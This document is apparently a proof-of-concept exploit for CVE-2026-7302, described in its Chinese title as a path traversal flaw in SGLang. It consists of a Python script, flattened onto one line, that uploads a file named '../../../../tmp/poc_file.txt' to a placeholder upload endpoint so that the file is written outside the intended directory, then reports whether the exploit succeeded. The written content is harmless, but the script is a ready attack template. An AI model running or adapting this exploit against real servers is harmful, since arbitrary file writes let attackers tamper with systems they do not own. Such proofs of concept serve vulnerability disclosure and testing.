CVE-2026-7302 SGLangs路径遍历漏洞

import requests # Target URL (Replace with actual vulnerable endpoint) target_url = "http://target-ip:port/api/upload" # Malicious filename containing path traversal sequences # This attempts to write a file to the /tmp/ directory malicious_filename = "../../../../tmp/poc_file.txt" # File content to be written file_content = "This file was written by CVE-2026-7302 PoC." # Constructing the multipart form data files = { 'file': (malicious_filename, file_content) } try: response = requests.post(target_url, files=files) if response.status_code == 200: print(f"[+] Exploit successful! Server responded with status {response.status_code}") print(f"[+] Check /tmp/poc_file.txt on the target server.") else: print(f"[-] Exploit failed. Server responded with status {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")